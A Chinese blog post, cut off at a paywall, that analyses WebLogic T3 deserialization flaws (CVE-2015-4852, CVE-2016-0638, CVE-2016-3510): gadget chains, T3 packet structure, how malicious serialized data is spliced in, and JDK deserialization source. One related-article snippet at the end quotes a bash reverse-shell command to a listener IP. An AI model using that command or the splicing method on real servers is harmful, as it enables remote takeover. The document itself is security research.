WebLogic反序列化之CVE-2015-4852、CVE-2016-0638、CVE-2016-3510

最新推荐文章于 2024-08-31 21:17:55 发布
最新推荐文章于 2024-08-31 21:17:55 发布
阅读量935 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: Java安全 文章标签: java 反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40710190/article/details/125793360
本文详细介绍了WebLogic反序列化漏洞,包括CVE-2015-4852、CVE-2016-0638和CVE-2016-3510,重点分析了T3协议、数据流到Object的过程,以及这三个CVE的利用链。文章探讨了WebLogic RMI的特性,揭示了利用恶意序列化数据启动荷载Class的方法,展示了如何通过T3协议插入恶意序列化数据并触发漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

WebLogic反序列化之CVE-2015-4852、CVE-2016-0638、CVE-2016-3510

CVE-2015-4852CVE-2016-0638CVE-2016-3510这3个CVE常常被拿到一起来讲,因为后2个CVE都是以CVE-2015-4852利用链为基础建立的。

按照我对反序列化利用链的理解,包含2个部分:

  1. 承担恶意代码的荷载Class
  2. 启动荷载Class启动Class或者启动机制

CVE-2015-4852的荷载Class就是较为熟知的Apache CC利用链,关于CC利用链的分析文章很多,就不在这里写了。放一篇我关于CC1的文章ysoserial gadget Commons-Collections1保姆级分析,核心就是ChainedTransformerConstantTransformerInvokerTransformer

关于承担恶意代码的荷载Class就到此为止,而怎么启动荷载,就需要先了解WebLogicT3协议。因为WebLogic通过读取数据包里T3协议格式的序列化数据然后将其反序列化得到Object

T3协议是WebLogic RMI使用的协议,是JRMP的强化版。

T3协议

WebLogic RMI就是WebLogic对Java RMI的实现,在功能和实现方式上稍有不同。我们来细数一下WebLogic RMIJava RMI的不同之处。

  • WebLogic RMI支持集群部署和负载均衡。

因为WebLogic本身就是为分布式系统设计的,因此WebLogic RMI支持集群部署和负载均衡也不难理解了。

  • WebLogic RMI的服务端会使用字节码生成(Hot Code Generation)功能生成代理对象。

WebLogic的字节码生成功能会自动生成服务端的字节码到内存。不再生成Skeleton骨架对象,也不需要使用UnicastRemoteObject对象。

  • WebLogic RMI客户端使用动态代理。

WebLogic RMI客户端中,字节码生成功能会自动为客户端生成代理对象,因此Stub也不再需要。

  • WebLogic RMI主要使用T3协议(还有基于CORBAIIOP协议)进行客户端到服务端的数据传输。

T3传输协议是WebLogic的自有协议,它有如下特点:

  1. 服务端可以持续追踪监控客户端是否存活(心跳机制),通常心跳的间隔为60秒,服务端在超过240秒未收到心跳即判定与客户端的连接丢失。
  2. 通过建立一次连接可以将全部数据包传输完成,优化了数据包大小和网络消耗。

关于T3协议我本来想找一下有没有详细的定义,但是百度Google都没有找到,直到看到SeeBug里有篇文章说因为WebLogic闭源的原因就没有T3协议规则这方面的资料。不过网上对应Poc利用部分的T3协议分析倒是有。

具体分析参考漏洞原理weblogic t3 协议利用与防御

  • 发现每个数据包里不止包含一个序列化魔术头。(0xac 0xed 0x00 0x05)
  • 每个序列化数据包前面都有相同的二进制串。(0xfe 0x01 0x00 0x00)
  • 每个数据包上面都包含了一个T3协议头。
  • 仔细看协议头部分,发现数据包的前4个字节正好对应着数据包长度
  • 以及我们也能发现包长度后面的01代表请求,02代表返回。

这些点说明了T3协议由协议头包裹,且数据包中包含多个序列化的对象。

现在知道了T3协议的格式,那么接下来有2种思路

  1. 替换数据包中多个序列化对象任意一个为恶意序列化数据

  2. weblogic发送的JAVA序列化数据的第一部分与恶意序列化数据进行拼接。

其实在我看来是一个意思,无非是选择替换第几个正常序列化部分

网上的payload都是直接替换第1个序列化对象,我参考的Poc是这个Weblogic_direct_T3_Rces

搞清楚怎么在T3协议数据流中加入恶意序列化数据后,接下来就可以说一说服务端是如何反序列化恶意数据并启动CC链。

从数据流到Object

Weblogic通过7001端口,获取到流量中T3协议的java反序列化数据。

通过调用栈,可以发现Weblogic最后通过ObjectInputStream读入序列化数据,并在readClassDesc(boolean unshared)方法中拿到类描述符来确定字节流中传递数据的类型,并交给对应的方法进行处理。

//ObjectInputStream.java
/**
 * Reads in and returns (possibly null) class descriptor.  Sets passHandle
 * to class descriptor's assigned handle.  If class descriptor cannot be
 * resolved to a class in the local VM, a ClassNotFoundException is
 * associated with the class descriptor's handle.
 */
private ObjectStreamClass readClassDesc(boolean unshared)
    throws IOException
{
   
   
    byte tc = bin.peekByte();
    ObjectStreamClass descriptor;
    switch (tc) {
   
   
        case TC_NULL:
            descriptor = (ObjectStreamClass) readNull();
            break;
        case TC_REFERENCE:
            descriptor = (ObjectStreamClass) readHandle(unshared);
            break;
        case TC_PROXYCLASSDESC:
            descriptor = readProxyDesc(unshared);
            break;
        case TC_CLASSDESC:
            descriptor = readNonProxyDesc(unshared); //进这里
            break;
        default:
            throw new StreamCorruptedException(
                String.format("invalid type code: %02X", tc));
    }
    if (descriptor != null) {
   
   
        validateDescriptor(descriptor);
    }
    return descriptor;
}

这里会走case TC_CLASSDES,在readNonProxyDesc()里通过readClassDescriptor()拿到描述符并作为参数传给resolveClass(readDesc)方法拿到相对应的Class对象,最后通过desc.initNonProxy()初始化。

//ObjectInputStream.java
/**
 * Reads in and returns class descriptor for a class that is not a dynamic
 * proxy class.  Sets passHandle to class descriptor's assigned handle.  If
 * class descriptor cannot be resolved to a class in the local VM, a
 * ClassNotFoundException is associated with the descriptor's handle.
 */
最低0.47元/天 解锁文章

200万优质内容无限畅学
Java反序列化(之)Weblogic反序列化系列 CVE-2016-0638 分析
Vicl1fe的博客
04-01 1943
前言
Java反序列化(之)Weblogic反序列化系列初探 CVE-2015-4852
Vicl1fe的博客
03-24 1614
前言 weblogic反序列化主要有XMLDecoder和T3协议。先从T3协议开始,主要是CVE-2015-4852这个漏洞 环境搭建 https://blog.csdn.net/qq_41918771/article/details/117467957 https://blog.csdn.net/weixin_45682070/article/details/123230456 主要参考这两篇文章,第一篇是我写的,但是由于源不能用了原因,可以参考第二篇 T3协议 T3概述 RMI通信使用的是序列化数
WebLogic基于T3协议的反序列化 CVE-2016-0638/CVE-2016-3510
01-29 5438
WebLogic基于T3协议的反序列化 CVE-2016-0638/CVE-2016-3510 CVE-2016-0638 是前面分析的 CVE-2015-4852 的一个绕过,通过找到一个不在黑名单中的类,且这个类存在readObject/readResolve/readExternal 方法,并且恰好这些方法里面有一些数据进行反序列化操作,那么这时我们就可以把原生的序列化数据封装到这个类里面,通过调用反序列化对象重写的readObject/readResolve/readExternal 方法这一特点来
weblogic0638_weblogicCVE-2016-0638反序列化分析
weixin_39787089的博客
12-20 567
此漏洞是基于CVE-2015-4852漏洞进行黑名单的绕过,CVE-2015-4852补丁主要应用在三个位置上weblogic.rjvm.InboundMsgAbbrev.class :: ServerChannelInputStreamweblogic.rjvm.MsgAbbrevInputStream.classweblogic.iiop.Utils.class所以如果能找到可以在其readO...
weblogic反序列化_CVE20163510:Weblogic反序列化分析
weixin_39662594的博客
11-26 1061
更多全球网络安全资讯尽在邑安全影响范围Oracle WebLogic Server 12.2.1.0Oracle WebLogic Server 12.1.3.0Oracle WebLogic Server 12.1.2.0Oracle WebLogic Server 10.3.6.0演示环境Oracle WebLogic Server 10.3.6.0Windows 10.0.1836...
weblogicCVE-2016-0638反序列化分析
weixin_30455023的博客
01-08 4113
此漏洞是基于CVE-2015-4852漏洞进行黑名单的绕过,CVE-2015-4852补丁主要应用在三个位置上 weblogic.rjvm.InboundMsgAbbrev.class :: ServerChannelInputStream weblogic.rjvm.MsgAbbrevInputStream.class weblogic.iiop.Utils.class 所以如果能找...
WebLogic基于T3协议的反序列化CVE-2015-4852
01-29 3825
前言 WebLogic 中的反序列化漏洞可以分为两种,第一种为基于 T3 协议的反序列化,第二种为基于 XML 的反序列化,下面表格为大概 CVE 分布,在基于 T3 的反序列化漏洞中,很多是基于 CVE-2015-4582 漏洞的一个相关绕过,而对 CVE-2015-4582 漏洞的绕过又大体应该分为两类,下面对 CVE-2015-4582 进行调试分析,为后面的绕过打下基础。 基于 T3 CVE-2015-4582 CVE-2016-0638 CVE-2016-3510 CVE-2018-262
weblogic 反序列化CVE-2020-2883)
最新发布
qq_52579508的博客
08-31 948
描述: Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。“bash -i >& /dev/tcp/172.18.52.33/11111 0>&1” 这一段是需要进行编译的。前面是的 nc 监听 一直出问题 我的 监听ip 出错了 所以一直错 一直监听不到。后面换了windows 使用子系统去运行 poc poc 应该没问题 可能是 监听问题。用的kali 监听 很慢 一直返回不了 shell。
weblogic-CVE-2016-3510
博客地址 www.sec0nd.top
07-05 1601
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。这个漏洞是java反序列化的漏洞原理是将反序列化的对象封装进了weblogic.corba.utils.MarshalledObject,然后再对 MarshalledObject进行序列化。...
Weblogic漏洞Java反序列化CVE-2015-4852解析
simonnews的博客
05-04 5518
weblogic系列_Java反序列化_CVE-2015-4852 1:概述1.1:官方概述1.2:漏洞概述2:漏洞原理分析2.1:基本概念2.1欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也...
weblogic漏洞初探之CVE-2015-4852
洋洋的小黑屋
08-13 846
weblogic漏洞初探之CVE-2015-4852 一、环境搭建 1. 搭建docker 这里用了vulhub的环境进行修改:https://vulhub.org/ 新建个文件夹,创建两个文件docker-compose.yml、DockerFile docker-compose.yml: version: '2' services: weblogic: image: vulhub/weblogic:10.3.6.0-2017 ports: - "7001:7001" -
Weblogic 反序列化漏洞检查工具CVE-2017-10271.zip
07-09
Weblogic 反序列化漏洞检查工具CVE-2017-10271.zip
weblogic漏洞分析之CVE-2016-0638
洋洋的小黑屋
08-17 2466
weblogic漏洞分析之CVE-2016-0638 一、环境搭建: 这里使用前一篇文章的环境,然后打上补丁 上一篇文章:https://www.cnblogs.com/yyhuni/p/15137095.html 下载补丁p20780171_1036_Generic和p22248372_1036012_Generic 解压补丁后,复制补丁到Docker中: docker cp ./p22248372_1036012_Generic/ d1b6be39e32e:/home/ docker cp ./p2
weblogic反序列化_从Weblogic原理上探究CVE20154852CVE20160638CVE20163510究竟怎么一回事...
weixin_39612653的博客
11-29 1408
更多全球网络安全资讯尽在邑安全目前。网上关于CVE-2015-4852漏洞的资料很多,但是针对CVE-2015-4852漏洞如何修复,修复补丁又是如何生效的却少之又少;而CVE-2016-0638CVE-2016-3510这两个漏洞又是如何绕过CVE-2015-4852补丁的,则只是在介绍Weblogic系列漏洞时被一句话带过。CVE-2015-4852CVE-2016-0638以及...
Weblogic处理流量中的java反序列化数据的流程(CVE-2015-4852CVE-2016-0638CVE-2016-3510)
weixin_45682070的博客
03-08 2251
前言 想要搞明白weblogicT3协议中的反序列化和后续的反序列化绕过,就得先需要了解weblogic如何处理T3协议中的反序列化数据,了解流程之后再去分析CVE-2015-4852CVE-2016-0638CVE-2016-3510这些漏洞,会事半功倍。 weblogic处理反序列化的流程 首先我们看一张流程图,这是weblogic处理反序列化数据的时候的函数调用图 截图比较粗糙,其起始位置是我们熟悉的ObjectInputStream类中的readObject方法。下面是一层层调用的函数,在红色
Java反序列化(之)Weblogic反序列化系列 CVE-2016-3510 分析
Vicl1fe的博客
04-01 1248
前言 之前也提到了CVE-2016-3510,他也是针对于CVE-2015-4852的黑名单绕过,其实具体的原理和CVE-2016-3608是一样的 最好先看看CVE-2016-3510 CVE-2016-3510 CVE-2016-3510使用的绕过类是weblogic.corba.utils.MarshalledObject,首先查看该类的构造方法, 构造方法接收一个Object类型的参数var1,最后转为转为字节数组赋值给this.objBytes 继续查看readResolve方法,发现这里会直接
CVE-2015-4852 Weblogic T3 反序列化分析
蚁景网安学院
12-07 1742
看到很多师傅的面经里面都有提到 Weblogic 这一个漏洞,最近正好有一些闲暇时间,可以看一看。因为环境上总是有一些小问题,所以会在本地和云服务器切换着调试。
CVE-2015-4852 java 反序列化漏洞--weblogic补丁
热门推荐
水滴石穿
01-04 2万+
    CVE-2015-4852 Patch Availability Document for Oracle WebLogic Server Component of Oracle Fusion Middleware (Doc ID 2075927.1) To Bottom APPLIES TO: PeopleSoft Enterprise PT Peo...
利用POC检测WebLogic反序列化漏洞CVE-2019-2725
在2019年,Oracle WebLogic服务器遭遇了一个严重的反序列化漏洞,即CVE-2019-2725。这个漏洞允许攻击者通过精心构造的恶意请求,利用WebLogic应用程序中的序列化功能来执行任意代码,从而获取系统控制权限。由于其...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值